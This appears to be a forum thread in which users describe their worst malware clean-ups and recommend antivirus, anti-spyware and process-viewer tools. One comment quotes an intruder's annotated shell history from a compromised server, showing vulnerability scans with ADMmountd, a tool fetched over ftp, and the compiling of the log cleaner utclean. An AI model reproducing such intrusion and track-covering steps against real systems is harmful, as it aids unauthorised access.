Worst Security Clean-Up You've Performed? 158
nakhla writes "Last night, I was tasked (by my wife) to help fix her friend's computer. It is a Windows XP home system which has been running slowly, almost to the point of un-usability (like *that's* never happened before). It turns out that hundreds of random processes had filled up its meager 256 MB of RAM. The cause? Nearly 7,500 viruses and worms that had infected the system. That number doesn't even include the hundreds of spyware and adware programs that had installed themselves, as well. Although the box is now behind a firewall, that wasn't always the case. This was, by far, the most infected system I'd ever seen, but I'm sure it can't be the worst ever. What was the worst security cleanup you ever had to perform?"
Here's my toolkit... (Score:2, Informative)
I've been working in the small shop/repair business for over 5 years, and its a weekly experience to get a machine in with thousands of trojans, viruses and spy apps. In cases where a re-install may not be desirable or feasable, here's a list of the tools we use to find, isolate and eradicate hostile software.
Disclaimer: I do not work for any of these companies, nor am I been paid anything by them. I just find that these tools work. Your mileage may vary.
1: Antivirus
As most of our customers are home users, we can recomend Grisoft's AVG as the most capable and reasonably priced ':)' antivirus out there. It does a pretty good job, and the installers are kept up to date so you don't have to fudge around with d'loading on a broken box.
AVG Free [grisoft.com]
2: Anti-Spyware
No-brainer. The best two in the business. Spybot and Ad-Aware. They don't get everything, but they both do a darn good job, and can even set themselves up to run on reboot before some of the uglies get going. We leave them on the system so we can attempt to train the user towards a safer future.
Ad-Aware Personal [lavasoftusa.com]
SpyBot S&D [safer-networking.org]
3: Process Viewers
Now this gets a little harder. Neither of these tools will do the job automatically, but with care, can show you the files and processes that are the center of these little problems. Personally, I like MS/Sysinternals Process Explorer, my boss prefers PrcView. As an interesting note: You'll occasionally find a hostile that can stop certain known process viewers from starting up. Get the old 95/98 version of PrcView. They always seem to miss that one. Recording the file name of the app, rebooting to the recovery console, and going in to hand delete the app works 98% of the time.
PrcView [teamcti.com]
Process Explorer [microsoft.com]
Now, the easy route....
Get yourself one of these. USB HDD Adapter Kit [tigerdirect.com] from your favourite retailer, and just hook the offending HDD up to a good machine with a up to date anti-virus scanner. You will have some broken startup and registry entries left over, but they're pretty simple in comparision.
I'd normally say, Enjoy! at this juncture. But you probably won't.
Best of Luck
kgs
Re: HOW did you clean it up? (Score:3, Informative)
I know what I'll do next time.
Script Kiddie Hunt (Score:3, Informative)
It was pretty good about cleaning up after its last logs, but I finally managed to stumble into the kiddie's home dir on my box... the damned kiddie forgot to clean up his
Looking at that (also Redhat 5.x) server's web site, I noticed that it had some evil users who exposed
So I cleaned up some other computer as well as mine. That was pretty much the time I migrated to Debian for good... haven't had nary a problem before or since.
Anyway, here are some annotated excerpts from the
blksheep/.bash_history
cd
cd
ls
ADMmountd liuxcentral.com -t 0 # plenty of typos while "scanning" for vulnerable hosts
ADMmountd linuxcentral.com -t 0
ADMmountd www.mondenet.com -t 0
# retrieving the logfile cleaning utility, which didn't work on
ftp goethe.sbu.edu
mv utclean.wri utclean.c
gcc utclean.c -o utlcean
mv utlcean
mv utlcean utclean
chmod +x utclean
# Testing his rootkit
who
ls
screen find / -name
ls
cat blah
rm blah
cat
Re:HOW did you clean it up? (Score:4, Informative)
You don't. It is not worth the time and effort unless your personal / professional time has zero value. Get your data off and reinstall / restore from image.
Otherwise (if you are getting paid well for it) you can boot off a live CD or install the drive as a second in another system (one that has all the autorun crap disabled), Run AV/AS(pyware) on the drive, edit the registry removing all the startup items that you know isn't needed, run md5 comparisons on all the system files, and go from there. Dumping the registry and comparing with a known good registry is helpful at spotting crap.